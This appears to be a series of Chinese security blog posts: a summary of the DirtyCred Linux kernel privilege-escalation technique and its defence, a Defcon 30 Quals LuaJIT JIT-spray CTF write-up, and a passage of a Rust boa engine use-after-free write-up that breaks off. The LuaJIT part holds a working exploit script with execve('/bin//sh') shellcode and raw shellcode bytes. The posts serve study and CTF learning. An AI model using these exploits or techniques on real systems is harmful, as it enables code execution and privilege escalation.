还是常规的 OOB write 的利用操作：尝试越界写入下一个结构体的字段，将该结构体原先指向低权限 credential 结构体指针被修改为指向高权限 credential 结构体指针。这种修改指向的方法是通过往指针低两个字节写入0（即 0x0000）来进行的，之所以是写两个字节的 0 而不是其他的，是因为攻击者希望把原指针修改为当前页所在首部的 privileged credentials。攻击者可以通过频繁创建 privileged credentials 对象来占据新页面的首部位置，为后续修改指针做准备。
由于页面以 0x1000 字节对齐，而写入两个字节的 0 要求 privilege credential 所在的地址以 0x10000 字节对齐，因此可能需要以 1/16 的概率进行爆破才能利用成功。

2. Use After Free

UAF 和先前介绍的 CVE-2021-4154 漏洞利用流程差不多。

如果 UAF 的地方在 credential dedicated cache上，那只需释放掉原先的 unprivileged credential，使用新创建的 privileged credential 对象来占据这个内存空洞，即可完成置换。
如果 UAF 的地方在 generic cache 上（大多数情况），那就要求这个 UAF 漏洞拥有 invalid-write 的能力。即先释放出一个内存空洞，使用一个带有 credential pointer 的可利用对象来占据这个内存空洞，然后利用 UAF 悬垂指针来改这个 credential pointer 即可。

3. Double Free

Double Free 的利用略显复杂，先上图：

利用流程大致是：

在 vulnerable object 所在的 cache 中，大量分配对象，使得
1. 这些所分配的对象，其释放时机可控
2. “大量分配对象” 的这个大量，是要分配至少一个页面的内存空间。
这么做的目的只有一个：使某个内存页面的被回收时机可控。因为如果这个页面上的所有对象全部释放，那么该空闲页面自然就会被回收。
尝试触发两次 double free 漏洞，使得最终某个被释放内存块上有两个悬垂指针。
释放该 vulnerable object 所在页面上的所有对象，使得该页面被回收进分配器中，并被用于 credential 的内存分配（即成为 dedicated cache）
在这块已经成为 credential dedicate cache 的内存页面上大量分配 credential 结构体，占据该页面的内存空间（即 Figure 3(f)）。
注意到两个悬垂指针可能不会与 credential object 对齐，因此需要用掉一个悬垂指针来释放出一块 credential object 的内存空洞出来。
分配新 credential object，占据这个内存空洞。这样就可以达到两个指针共同指向一个 credential object 的效果，后续的利用就可参照 UAF 的方式来进行，这里就不再赘述了。

这里有个有趣的问题：一个原先指向 generic cache 的指针，如果这个指针所指向内存变更为 dedicated cache，那么后续对这个以为是 generic pointer 实则是 dedicated pointer 进行 free 操作时，这个 free 的大小是如何界定的？为什么 free 的大小是 credential object 的大小呢？

通过查阅 slab 分配器的 kfree 逻辑，发现它的释放逻辑与被释放地址高度相关。首先会尝试根据被释放地址获取其对应的 slab_cache 结构，然后再根据结构中所存放的信息来释放对应的 object size。换句话说，如果 kfree 释放的地址在 generic cache中，那就会走 generic cache 的释放逻辑；如果是在 dedicated cache 中，那就会走 dedicated cache 的释放逻辑。这么做或许是为了提高可用性，使得释放两个不同 cache 的内存块可以使用同一个 kfree 接口。

六、延长竞争窗口

Dirty Cred 需要在检查文件写权限 - 实际写入数据 这两步之中，成功将低权限 credential 替换为高权限 credential。由于 credential 的替换需要一些时间，因此如果能延长这个竞争窗口，那就能非常成功的进行漏洞利用。

1. 有趣的机制

这里需要先介绍两个有趣的机制，分别是 Userfaultfd 和 FUSE，这两种机制都允许用户无限延长竞争窗口。

a. Userfaultfd

在多线程程序中，userfaultfd 允许一个线程管理其他线程所产生的 Page Fault 事件。当某个线程触发了 Page Fault，该线程将立即陷入 sleep，而其他线程则可以通过 userfaultfd 来读取出这个 Page Fault 事件，并进行处理。

Userfaultfd 常用于条件竞争漏洞利用中。但悲伤的是，为了防止 userfaultfd 在内核漏洞利用中的滥用，在内核 5.11 版本开始，非特权的 userfaultfd 默认是禁用的（LWN: Blocking userfaultfd() kernel-fault handling）。

参考：Linux Manual Page（man userfaultfd）。

b. FUSE

FUSE 是一个用户层文件系统框架，允许用户实现自己的文件系统。用户可以在该框架中注册 handler，来指定应对文件操作请求。这样一来便可以在实际操作文件之前，执行 handler 暂停内核执行，尽可能地延长窗口。

2. Userfaultfd 利用方式

在 Linux 4.13 之前，系统调用 writev 的实现大致如下：

攻击者可以在权限检查执行完成后，在调用 import_iovec 时触发缺页错误，从而利用 userfaultfd 机制来暂停内核的执行。

但在 linux 4.13 版本之后，该函数的实现变成了如下，即将 import_iovec 函数的调用提前了：

这就使得刚刚所说的利用方法不再有效，需要换一种方式。

由于 Linux 中文件系统是以多层形式实现，即高层接口调用底层函数来实现操作，因此在写入文件数据时，最终都会调用到一个称为 generic_perform_write 的函数，该函数中会主动触发一次 Page Fault，同样可以利用 userfaultfd 来实现利用：

3. 文件系统 lock 的利用方式

以 ext4 文件系统的数据写入为例，可以看到在执行 generic_perform_write 函数进行实际的数据写入之前，都需要对 inode 进行一次上锁（即 inode_lock(inode) 调用）：

如果有一个进程率先对某个文件进行超大量数据写入，那么另一个进程在对相同文件执行写入操作时，将会一直等待 inode 锁的释放。通过测试可知，4GB 数据的写入可以使得后一个进程等待数十秒（取决于硬盘性能），因此这个 inode 锁同样可以延长竞争窗口。

七、分配特权对象

由于 Dirty Cred 十分需要控制 privilege credential 对象的分配时机，控制该对象的分配成为了一个关键点。

在用户层中，有两种方法可以分配 privilege credential:

大量执行 Set-UID 程序（例如 sudo），或者频繁创建特权级守护进程（例如 sshd），从而创建 privilege cred 结构体。
使用 ReadOnly 方式来打开诸如 /etc/passwd 等特权文件。

在内核层中，当内核创建新的 kernel thread 时，当前 kernel thread 将会被复制，于此同时其 privileged cred 结构体也会被拷贝一份。因此只要能找到稳定创建 kernel thread 的方式，Dirty Cred 就能稳定地创建 privileged cred 结构体。有两种方法可以做到这点：

往 kernel workqueue 中填充大量任务，动态创建新的 kernel thread 来执行任务。

调用 usermode helper （一种允许内核创建用户模式进程的机制），一种最常见的应用场所是加载内核模块至内核空间中。

// kernel\kmod.c
static int call_modprobe(char *module_name, int wait)
{
 struct subprocess_info *info;
 static char *envp[] = {
     "HOME=/",
     "TERM=linux",
     "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
     NULL
 };

 char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
 if (!argv)
     goto out;

 module_name = kstrdup(module_name, GFP_KERNEL);
 if (!module_name)
     goto free_argv;

 argv[0] = modprobe_path;
 argv[1] = "-q";
 argv[2] = "--";
 argv[3] = module_name;  /* check free_modprobe_argv() */
 argv[4] = NULL;

    // 调用 usermode helper
 info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
                NULL, free_modprobe_argv, NULL);
 if (!info)
     goto free_module_name;

 return call_usermodehelper_exec(info, wait | UMH_KILLABLE);

free_module_name:
 kfree(module_name);
free_argv:
 kfree(argv);
out:
 return -ENOMEM;
}

内核在加载内核模块时，需要在内核层执行 modprobe 程序，来在标准安装驱动路径下搜索目标驱动。

八、评估

1. 评估环境

Linux 5.16.15

2. 可利用的内核对象

对象中包含 credential 对象且可控制该对象在内核堆上的分配时机。

从上图中可以看到，

几乎每个 generic cache 都至少有两个可利用对象
credential 在可利用对象中的偏移量有较大差别，而这可以提高 Dirty Cred 的利用成功率
尤其是 OOB 漏洞可覆写的偏移量可能偏差较大。
有五个可利用对象所包含的 credential 的相对偏移量为 0，提高了 Dirty Cred 在内存破坏范围较小情况下的利用成功率。

3. 满足评估条件的 CVE 漏洞

要求：

在 2019 年及以后报告的 Linux 内核漏洞
能够在 Linux 堆上进行堆破坏
触发无需特定硬件条件支持
可复现相应内核 panic

从上图中可得知，在所有缓解机制全部启动的情况下，Dirty Cred 的利用成功率为：16/24。其中：

Double Free 的漏洞能全部完成利用
OOB 中存在一些不能完成利用的 case，有些是因为 OOB write 所在的地方是 virtual memory 而不是 kmalloc‘ed 内存，暂无可利用对象。
UAF 中一些不能完成利用的 case 是：有些只能 UAF read，不能进行 invalid-write；还有些是能 invalid-write 但是写入的位置不在可利用对象的 credential 字段上。

九、Dirty Cred 防护

Dirty Cred 之所以能成功，最核心的是：内核的内存隔离是基于类型而不是基于权限来做的。

防护方法其实很简单：将 privileged credentials 与其他 unprivileged credentials 隔离开。

如何做：使用 vzalloc/kvfree 函数来在 virtual memory 中创建与释放 privileged credentials 内存。这样就能使得 privileged 和 unprivileged 对象所在的 memory cache 是隔离开的。

之所以使用 virtual memory 来存放 privileged credentials，是因为

如果是使用两个不同的 kmalloc’ed memory cache，那有可能通过 Linux 内核重用机制来把 privileged credentials 所在内存页与 unprivileged 所在页合并，造成隔离失效。
虚拟内存区域是内核动态分配、虚拟连续的内存，驻留在 VMALLOC_START 至 VMALLOC_END 中的内存区域。这就使得虚拟内存区域中的内存永远不会与直接映射的内存区域重叠。

这里顺带提一句 kmalloc 和 vmalloc 所分配内存的性质：
都是分配的内核内存
kmalloc 保证分配的内存在物理地址空间上连续；vmalloc 保证虚拟地址空间上连续（需要配置页表）
kmalloc 能分配的大小有限，vmalloc 能分配的大小相对较大
vmalloc 因为要设置页表，自然会慢一点

要被隔离的 credential 结构体为：

UID 为 GLOBAL_ROOT_UID 的 struct cred（privileged credentials）
打开方式中带有可写的 struct file（unprivileged credentials）

之所以要把这两个隔离，个人猜测是这两种类型的结构（GLOBAL_ROOT_UID or writable file）创建的次数相对其他结构（非特权级 UID 或者只读文件结构）较少。

由于这种隔离是在 credential 创建时所确定的，那如果某个非特权 cred 结构体被原地提权（例如通过 setuid/cap_setuid），那就会造成这种内存隔离形同虚设。鉴于此，可以尝试在 alter_cred_subscribers 函数被执行时，在虚拟内存区域新创建一个特权 cred, 而非在原先 cred 上进行修改。但这种防护方法很依赖 Linux 未来的开发发展，倘若以后 Linux 新开发了一种原地修改 cred 的方式，那么这种防护就无效了，因此这个防护被留待 Future work。

Dirty Cred 防护的性能评估：

从中可得知绝大部分的性能开销都非常的小（< 3%），不会影响系统的正常使用。但其中 10k File Create 的性能开销达到了 7%，这是因为 vmalloc 的执行速度会比 kmalloc 低很多，因为需要重新进行内存映射等等；而 10k File Delete 的性能开销相对较小一点，因为 Linux 内核使用 RCU 机制来异步进行文件删除，以提高内核执行速度。

RCU (Read-copy update) 是 Linux内核中的一种数据同步机制。

上图评估结果中还出现了“轻微的性能改善”，这个纯粹是实验所产生的噪声，不是真的改善（虽然这个实验重复了多次基准测试）。

十、参考链接

Defcon-30-Quals smuggler's cove 复盘笔记

2022-08-29T16:00:00.000Z

一、简介

这里将记录着本人复盘 Defcon 30 Quals 中 smuggler's cove 的复盘笔记。

本题是一道 luaJIT 的 pwn 题。

二、环境配置

首先，从提供的 libluajit 文件中获取其版本号：

之后下载源码切换版本开始编译：

# 下载源码
git clone git@github.com:LuaJIT/LuaJIT.git
# 进入 LuaJIT 文件夹
cd LuaJIT
# 切换版本
git checkout v2.1.0-beta3
# 手动修改 LuaJIT/src/Makefile， 使得编译时带有调试信息
# 编译
make -j `nproc`
# 退出 LuaJIT 文件夹
cd ..
# 编译，链接时附带刚编译出来的 libluajit.so
gcc cove.c -g3 -ggdb3 -o mycove -I LuaJIT/src -L ./LuaJIT/src/ -l luajit
# 给编译出的 libluajit 改个名字
ln -s /root/cove/LuaJIT/src/libluajit.so /root/cove/LuaJIT/src/libluajit-5.1.so.2
# 指定库路径并执行
LD_LIBRARY_PATH=/root/cove/LuaJIT/src ./mycove

# 如果要执行提供程序本身，则使用以下指令
LD_LIBRARY_PATH=. ./cove exp.lua

三、漏洞点

题目主要给出了两个源码文件。一个是 dig_up_the_loot.c，该源码所编译出来的可执行文件是用来提供 flag 的，只有当使用特定参数执行该二进制文件时 flag 才会输出：

再一个源码文件就是调用 LuaJIT 库的主源码文件 cove.c。该源码中的内容大致如下几点：

读入 lua 文件，其中该 lua 文件大小最大不可超过 433 字节。

设置 luaJIT 配置，并禁用 JIT 全局变量的暴露，防止用户直接设置或修改 JIT 属性：

void set_jit_settings(lua_State* L) {
    luaL_dostring(L,
        "jit.opt.start('3');"
        "jit.opt.start('hotloop=1');"
    );
}

void init_lua(lua_State* L) {
    // Init JIT lib
    lua_pushcfunction(L, luaopen_jit);
    lua_pushstring(L, LUA_JITLIBNAME);
    lua_call(L, 1, 0);
    set_jit_settings(L);

    //set jit = nil;
    lua_pushnil(L);
    lua_setglobal(L, "jit");
    lua_pop(L, 1);
    ...

int print(lua_State* L) {
    if (lua_gettop(L) < 1) {
        return luaL_error(L, "expecting at least 1 arguments");
    }
    const char* s = lua_tostring(L, 1);
    puts(s);
    return 0;
}

最重要的一个操作。注册 lua 函数 cargo，该函数实际调用 C 函数 debug_jit。

GCtrace* getTrace(lua_State* L, uint8_t index) {
    jit_State* js = L2J(L);
    if (index >= js->sizetrace)
        return NULL;
    return (GCtrace*)gcref(js->trace[index]);
}

int debug_jit(lua_State* L) {
    if (lua_gettop(L) != 2) {
        return luaL_error(L, "expecting exactly 1 arguments");
    }
    luaL_checktype(L, 1, LUA_TFUNCTION);

    const GCfunc* v = lua_topointer(L, 1);
    if (!isluafunc(v)) {
        return luaL_error(L, "expecting lua function");
    }

    uint8_t offset = lua_tointeger(L, 2);
    uint8_t* bytecode = mref(v->l.pc, void);

    uint8_t op = bytecode[0];
    uint8_t index = bytecode[2];

    GCtrace* t = getTrace(L, index);

    if (!t || !t->mcode || !t->szmcode) {
        return luaL_error(L, "Blimey! There is no cargo in this ship!");
    }

    printf("INSPECTION: This ship's JIT cargo was found to be %p\n", t->mcode);

    if (offset != 0) {
        if (offset >= t->szmcode - 1) {
            return luaL_error(L, "Avast! Offset too large!");
        }

        t->mcode += offset;
        t->szmcode -= offset;

        printf("... yarr let ye apply a secret offset, cargo is now %p ...\n", t->mcode);
    }

    return 0;
}

注册的 lua 函数 cargo 要求传入参数必须分别为函数类型和整型类型。从代码中可以得知，当 lua 调用 cargo 函数后，lua 解释器会先寻找所传入 lua 函数的 JIT 相关结构体，并修改该 JIT 后所执行机器码的起始偏移量。被修改的属性 GCtrace::mcode 和 GCtrace::szmcode 分别是编译后机器码的起始位置和偏移量：

/* Trace object. */
typedef struct GCtrace {
  ...
  MSize szmcode;  /* Size of machine code. */
  MCode *mcode;   /* Start of machine code. */
  ...
} GCtrace;

因此，如果可以用立即数精心构造一段 JIT 后的机器码，再修改 JIT 代码起始位置，那么控制流就会将精心准备的立即数识别为指令执行，这样一来就可以成功执行 shellcode。

这种做法也被称之为 JIT Spray。

注意到 LuaJIT 设置了一段 jit 的配置：

void set_jit_settings(lua_State* L) {
    luaL_dostring(L,
        "jit.opt.start('3');"
        "jit.opt.start('hotloop=1');"
    );
}

其中两行 lua 代码都调用了 lua 中的jit.opt.start()函数，该函数的实现位于 LuaJIT/src/lib_jit.c:512 处：

/* jit.opt.start(flags...) */
LJLIB_CF(jit_opt_start)
{
  jit_State *J = L2J(L);
  int nargs = (int)(L->top - L->base);
  if (nargs == 0) {
    J->flags = (J->flags & ~JIT_F_OPT_MASK) | JIT_F_OPT_DEFAULT;
  } else {
    int i;
    for (i = 1; i <= nargs; i++) {
      const char *str = strdata(lj_lib_checkstr(L, i));
      if (!jitopt_level(J, str) &&
    !jitopt_flag(J, str) &&
    !jitopt_param(J, str))
  lj_err_callerv(L, LJ_ERR_JITOPT, str);
    }
  }
  return 0;
}

lua 两次调用 jit.opt.start 函数，分别设置了：

jit.opt.start('3')：进入 jitopt_level，设置优化等级为 3（最高）

/* Optimization levels set a fixed combination of flags. */
#define JIT_F_OPT_0 0
#define JIT_F_OPT_1 (JIT_F_OPT_FOLD|JIT_F_OPT_CSE|JIT_F_OPT_DCE)
#define JIT_F_OPT_2 (JIT_F_OPT_1|JIT_F_OPT_NARROW|JIT_F_OPT_LOOP)
#define JIT_F_OPT_3 (JIT_F_OPT_2|\
  JIT_F_OPT_FWD|JIT_F_OPT_DSE|JIT_F_OPT_ABC|JIT_F_OPT_SINK|JIT_F_OPT_FUSE)
#define JIT_F_OPT_DEFAULT JIT_F_OPT_3

/* Parse optimization level. */
static int jitopt_level(jit_State *J, const char *str)
{
  if (str[0] >= '0' && str[0] <= '9' && str[1] == '\0') {
    uint32_t flags;
    if (str[0] == '0') flags = JIT_F_OPT_0;
    else if (str[0] == '1') flags = JIT_F_OPT_1;
    else if (str[0] == '2') flags = JIT_F_OPT_2;
    // 这里！
    else flags = JIT_F_OPT_3;
    J->flags = (J->flags & ~JIT_F_OPT_MASK) | flags;
    return 1;  /* Ok. */
  }
  return 0;  /* No match. */
}

jit.opt.start('hotloop=1')：初始化 hotcount table。

/* Parse optimization parameter. */
static int jitopt_param(jit_State *J, const char *str)
{
  const char *lst = JIT_P_STRING;
  int i;
  for (i = 0; i < JIT_P__MAX; i++) {
    size_t len = *(const uint8_t *)lst;
    lua_assert(len != 0);
    if (strncmp(str, lst+1, len) == 0 && str[len] == '=') {
      int32_t n = 0;
      const char *p = &str[len+1];
      while (*p >= '0' && *p <= '9')
  n = n*10 + (*p++ - '0');
      if (*p) return 0;  /* Malformed number. */
      // 1. 控制流进入此处，保存参数
      J->param[i] = n;
      // 2. hotloop 判断
      if (i == JIT_P_hotloop)
    // 3. 调用该函数执行初始化操作
  lj_dispatch_init_hotcount(J2G(J));
      return 1;  /* Ok. */
    }
    lst += 1+len;
  }
  return 0;  /* No match. */
}

#if LJ_HASJIT
/* Initialize hotcount table. */
void lj_dispatch_init_hotcount(global_State *g)
{
  int32_t hotloop = G2J(g)->param[JIT_P_hotloop];
  HotCount start = (HotCount)(hotloop*HOTCOUNT_LOOP - 1);
  HotCount *hotcount = G2GG(g)->hotcount;
  uint32_t i;
  for (i = 0; i < HOTCOUNT_SIZE; i++)
    hotcount[i] = start;
}
#endif

这里需要参考以下两个链接来理解 hotcount：

简单来说，hotcount 就是 luajit 追踪特定控制流转移指令（例如调用、跳转等）的一个哈希表，其中存放着所最终指令的热度。luajit 是 tracing jit，而非 method jit，这意味着 luajit 在优化时会以路径为单位，而不是以函数或方法为单位。既然是追踪路径，那么自然就会对控制流转移指令更加的关注，也就会有 hotcount table 这样的设计。

不过 cove 对 JIT 的配置不会对我们的漏洞利用产生太大影响，这里只是简单的扩展了一下。

四、漏洞利用

前置调试知识：
若需执行程序，则直接执行 LD_LIBRARY_PATH=. ./cove exp.lua 即可。
若需调试程序，则先 gdb --args ./cove exp.lua 启动 gdb 会话，之后在 gdb 中执行 set env LD_LIBRARY_PATH . 即可。

先写个函数随便试试这个 LuaJIT：

function func() 
    local arr = {1, 2, 3, 4, 5, 6}
end

print(func)
-- cargo(func, 0)

结果触发 SIGSEGV 了，调试发现是 cove 中实现的 print 函数触发空指针。修改代码如下：

 int print(lua_State* L) {
     if (lua_gettop(L) < 1) {
         return luaL_error(L, "expecting at least 1 arguments");
     }
     const char* s = lua_tostring(L, 1);
-    puts(s);
+    puts(s ? s : "(nil)");
     return 0;
 }

重新编译后执行就不再触发 SIGSEGV 了。

再增加两个调用点，func 函数就会被 JIT 技术进行优化：

function func() 
    local arr = {1, 2, 3, 4, 5, 6}
end

func()
func()
cargo(func, 0)
-- 输出：INSPECTION: This ship's JIT cargo was found to be 0x800021feffdc

从 GDB 中的信息可以得知，该位置确实存放着所生成的机器指令，而这个位置位于一个 rx 段上：

在这个JIT生成的机器指令下断，下次执行 func 函数时就会触发这个断点（注意下图与上图不对应）；而修改调用 cargo 函数的第二个参数 offset，下次执行 JIT 函数时控制流也就会真的偏离 offset 个字节。：

现在我们已经了解如何触发函数的 JIT 优化，并且大致了解了其 JIT 所生成的机器码的情况，接下来要尝试在 JIT Machine Code 中布上我们特定的立即数。有一点需要注意，在 lua 中数字只有 Number 这么一个类型，不区分整型和浮点数型，不过 LuaJIT 内部是使用浮点数来表示 lua 的 Number 类型。这个可以用以下 lua 代码验证：

-- 一个大数
num1 = 0x112233445566
print(num1)        -- 输出 18838586676582
num1 = num1 + 0.5
-- 输出时精度丢失
print(num1)        -- 输出 18838586676583

-- 超大数，输出浮点数表示法
num1 = 0x1122334455667788
print(num1)        --输出 1.2346056164365e+18

现在尝试在 JIT Code 中部署特定值。由于 LuaJIT 启用了许多编译优化，例如 dead code elimination，因此在函数中创建数组对象后需要至少使用该对象一次，否则该对象将直接被删除。由于 print 函数实在是太难用了，因此换了种方法防止被优化。

编写的测试 lua 代码如下：

function func(arr) 
    arr[0] = 1.0;
    arr[1] = 2.0;
    arr[2] = 3.0;
    arr[3] = 4.0;
    arr[4] = 5.0;
    arr[5] = 6.0;
end

arr = {1, 2, 3, 4, 5}
func(arr)
func(arr)
cargo(func, 0)
func(arr)

查看编译后的代码，发现生成的 JIT 代码无法满足要求，LuaJIT 会把等号后的数单独保存至其他内存位置，需要使用时再去加载：

由于等号后边的内容再怎么便都无法改变被加载至其他内存的事实，因此我们可以尝试修改等号前面的属性内容，即 arr[xxx] = _ 中的 xxx。

在经过一番尝试后，发现属性如果是：

字符或字符串，则 JIT code 中会存在大量立即数，但是不可控。
诸如 1.0、2.0、3.0 等整型且连续的浮点数，则所生成的 JIT Code 还是会和先前的 JIT code 一致。

不连续的浮点数，则所生成的代码将正是我们所需要的那种。例如以下 lua 代码：

function func(arr) 
    arr[1.0] = 1;
    arr[5.0] = 2;
    arr[21.0] = 3;
    arr[244.0] = 4;
    arr[21.0] = 5;
    arr[422.0] = 6;
end

arr = {1, 2, 3, 4, 5}
func(arr)
func(arr)
cargo(func, 0)
func(arr)

所生成的 JIT Code：

这样一来，我们便可以达到在 JIT Code 上部署特定数据的目的，接下来便是编写 shellcode 并将其部署在 JIT Code 上，这个就是体力活了。

这里需要推荐一个网站在线浮点数转二进制，这个网站可以非常方便的转换浮点数与二进制。

我编写的 exploit 如下所示（注意，这个 exp 存在亿点点问题）：

function f(a) 
    a[1.2015822066494834e-135] = 1; -- 4831f6 4889f2 ebxx  0x(23ebf28948f63148)
    a[1.888017891495551e-193] = 2; -- 4889f1 56 9090 ebxx 0x(17eb909056f18948)
    a[1.8732669152797884e-193] = 3; -- 682f62696e 59 ebxx 0x(17eb596e69622f68)
    a[1.8748660135882913e-193] = 4; -- 682f2f7368 5f ebxx 0x(17eb5f68732f2f68)
    a[1.8880176708811596e-193] = 5; -- 48c1e720 9090 ebxx 0x(17eb909020e7c148)
    a[2.383013609192317e-222] = 6; -- 4809cf 57 9090 ebxx 0x(11eb909057cf0948)
    a[1.872946064693589e-193] = 7; -- 4889e7 6a3b 58 ebxx 0x(17eb583b6ae78948)
    a[1.8880178917328522e-193] = 8; -- 99 6a00 57 9090 ebxx 0x(17eb909057006a99)
    a[-2.4120921044623575e+255] = 9; -- 4889e6 0f05 90 f4f4 0x(f4f490050fe68948)
end

a = {1, 2, 3, 4, 5}
f(a)
f(a)
cargo(f, 0x80)
f(a)

其实际执行的 shellcode 为：

4831f6        xor %rsi, %rsi
4889f2        mov %rdx, %rsi
4889f1        mov %rcx, %rsi

56            push %rsi
682f62696e    push 0x6e69622f
59            pop rcx
682f2f7368    push 0x68732f2f
5f            pop rdi
48c1e720      shl %rdi, 32
4809cf        or %rdi, %rcx
57            push %rdi
4889e7        mov %rdi, %rsp

6a3b          push 0x3b
58            pop %rax
99            cltd

6a00          push 0
57            push %rdi
4889e6        mov %rsi, %rsp

0f05          syscall

注：jmp rel8 的机器码为 eb。

这里就快执行 SYS_execve("/bin//sh", ["/bin//sh", NULL], NULL) 了（mcode + 0x181）：

但比较奇怪的是，sh 直接退出了：

但我手动写了个代码尝试复现：

#include 
#include 

int main() {
    char* path = "/bin//sh";
    char* argv[] = { path, NULL };
    execve(path, argv, NULL);
    abort();
}

但是复现失败了：

即便是直接执行 shellcode：

#include 
#include 
#include 

char* shellcode = "\x48\x31\xf6\x48\x89\xf2\x48\x89\xf1\x56\x68\x2f\x62"
                  "\x69\x6e\x59\x68\x2f\x2f\x73\x68\x5f\x48\xc1\xe7\x20\x48"
                  "\x09\xcf\x57\x48\x89\xe7\x6a\x3b\x58\x99\x6a\x00\x57\x48\x89\xe6\x0f\x05";

int main() {
    // char* path = "/bin//sh";
    // char* argv[] = { path, NULL };
    // execve(path, argv, NULL);
    
    char buffer[50];
    memcpy(buffer, shellcode, 50);
    void (*scfunc)() = buffer;
    scfunc();
    abort();
}

也无法复现这种 /bin/sh 直接退出的情况：

百思不得其解。于是用 gdb 的 catch exec 指令，进入被调用的 dash 子进程开始调试，最后才发现原来是因为 stdin 被关闭了（捂脸）：

反过来才发现，cove 代码中其实早有说明，但是当时就是给漏看了：

void run_code(lua_State* L, char* path) {
    const size_t max_size = MAX_SIZE;
    char* code = calloc(max_size+1, 1);

    FILE* f = fopen(path,"r");
    ...
    fseek(f, 0, SEEK_END);
    size_t size = ftell(f);
    ...
    fseek(f, 0, SEEK_SET);
    fread(code, 1, size, f);

    // 这里！stdin 被关闭
    fclose(stdin);

    int ret = luaL_dostring(L, code);
    if (ret != 0) {
        printf("Lua error: %s\n", lua_tostring(L, -1));
    }
}

麻了，只能说还是自己观察的不够细致，踩了个坑。

本题复盘结束，完结撒花！

Defcon-30-Quals rust-pwn constricted 复盘笔记

2022-08-26T16:00:00.000Z

一、简介

这里将记录着本人复盘 Defcon 30 Quals 中 constricted 的复盘笔记。

这道题为 boa 项目提供了一个 git diff，要求在应用这个 diff 后对 boa 进行漏洞利用。boa 是一个使用 rust 编写的 javascript 引擎，要想 pwn 掉它就得编写 JS 的漏洞利用脚本。

当初做这题时自己还没接触过 rust，这次 ~~学成归来后~~ 可以好好看看这题。

这题的意图是想说明，即便是用 rust 编写的程序也仍然会存在漏洞。

注意，本题的调试是在实机中进行，非 docker 环境，因此 exp 可能不通用。

二、diff 内容

这里的 diff 总结起来大致如下：

在程序启动时随机 mmap 了一块内存。这里的 ctor 说明这个 init 函数需要在执行 main 函数前被执行：

use libc::{getrandom, mmap, MAP_PRIVATE, MAP_ANON};
use std::ptr;
use ctor::*;

#[ctor]
unsafe fn init() {
    let mut buf = [0u8; 4];
    getrandom(buf.as_mut_ptr() as *mut libc::c_void, 4, 0);
    let off = std::mem::transmute::<[u8; 4], u32>(buf).to_le() as usize;
    let off = off << 12;
    let length = 0x80000000 + off;
    mmap(ptr::null_mut(), length, 0, MAP_PRIVATE | MAP_ANON, -1, 0);
}

引入一个新的 JSObject 对象 TimedCache：
1
2
3
4
>> let v = new TimedCache()
undefined
>> v
TimedCache()
TimedCache 类代码在 boa_engine/src/builtins/timed_cache/mod.rs 中，这个类中有三个函数，分别是 get、set 和 has。这三个方法都和时间有关，功能类似一个定时器，可以用 set 函数安装定时器、get 函数获取目标定时器剩余时间，以及用 has 函数查看定时器是否超时。
在 console 类上额外实现了几个方法，分别是：
1. console.sysbreak()：调用该函数会触发一个 int3 中断。
  1
  2
  >> console.sysbreak()
  [1] 155238 trace trap (core dumped) target/debug/boa
2. console.sleep(ms)：线程暂停一段时间，单位毫秒。
  1
  2
  >> console.sleep(1000) // sleep 1s
  undefined
3. console.collectGarbage()：强制触发垃圾回收。这里触发的垃圾回收机制是 gc = "0.4.1" crate 内的，即 rust-gc。
4. 增强了 console.debug 方法，以更好的输出信息。
在 boa_engine/src/object/internal_methods/文件夹中，为半数以上的类做了个修改，让被修改类的每个静态 internal method 对象都分配在堆上，而不是在 data 段上。

三、漏洞定位

从上面总结的 diff 可以看出，diff 中：

提供了console.sleep、TimedCache 这种与时间处理有关的方法和类。
大肆修改静态对象的分配位置至堆上（原本在 data 段上好好的偏偏就要改到堆上）。
主动暴露出 rust-gc 强制触发垃圾回收的接口 console.collectGarbage。

那么这题无疑就是和 rust-gc 做斗争。可能有人会问，rust 不是不需要 gc 么？的确如此，但是只通过 Arc 和 Rc 来管理内存可能会造成循环引用等非常难顶的情况，同时也加大了开发难度。为了平衡内存管理的安全性与开发效率，rust-gc crate 便发挥出了它的作用。

rust-gc 是一个 mark-sweep 类型的 GC，只有被 mark 的对象才会保留，没有 mark 的对象会在垃圾回收时被销毁。相关信息在 rust-gc - github 上，一定要先看完里面的内容，了解 rust-gc 大致的用法。

在之前总结 diff 内容时我省略掉了关于 TimedCache 类的实现细节，而这里就是关键。在 boa_engine/src/builtins/timed_cache/mod.rs 中， TimedCacheValue 类使用 boa_gc （即 rust-gc 的 wrapper）来管理类实例：

#[derive(Debug, Clone)]
pub struct TimeCachedValue {
    expire: u128,
    data: JsObject,
}
...
impl Finalize for TimeCachedValue {}
unsafe impl Trace for TimeCachedValue {
    custom_trace!(this, {
        if !this.is_expired() {
            mark(&this.data);
        } 
    });
}

若 TimeCachedValue 中所保存的计时器超时，那么 TimeCachedValue 实例中的 data 将不再被标记，这意味着在超时后的某个时间点，这个 data 所占用的内存将会被释放。注意 data 字段的类型 JsObject 也是一个 GC 类型：

1
2
3

pub struct JsObject {
    inner: Gc,
}

但要注意的是，Gc<_> 只是一个 Gc::Cell 的指针类型。换句话说虽然 Gc<_> 指向的 Cell 被释放了，但 Gc<_> 本身还在 TimeCachedValue中，如果能在释放 Gc::Cell 后把 Gc<_> 指针偷出来，那就可以造成 UAF。

在整个 TimedCache 类的实现中，只有一处地方比较可疑，那就是 get 函数：

if let JsValue::Object(ref object) = this {
    // 1. check expire
    if !check_is_not_expired(object, key, context)? {
        return Ok(JsValue::undefined());
    }

    let new_lifetime = args.get_or_undefined(1);
    let expire = if !new_lifetime.is_undefined() && !new_lifetime.is_null() {
        // 2. calc new expire. Is it possible to collect `data`?
        Some(calculate_expire(new_lifetime, context)?)
    } else {
        None
    };

    if let Some(cache) = object.borrow_mut().as_timed_cache_mut() {
        if let Some(cached_val) = cache.get_mut(key) {
            if let Some(expire) = expire {
                cached_val.expire = expire as u128;
            }
            // 3. Maybe return freed reference of `data`
            return Ok(JsValue::Object(cached_val.data.clone()));
        }
        return Ok(JsValue::undefined());
    }
}

在 calculate_expire 函数中，会对传入的 lifetime 参数调用 to_integer_or_infinity 方法：

fn calculate_expire(lifetime: &JsValue, context: &mut Context) -> JsResult<i128> {
    let lifetime = lifetime.to_integer_or_infinity(context)?;
    ...
}

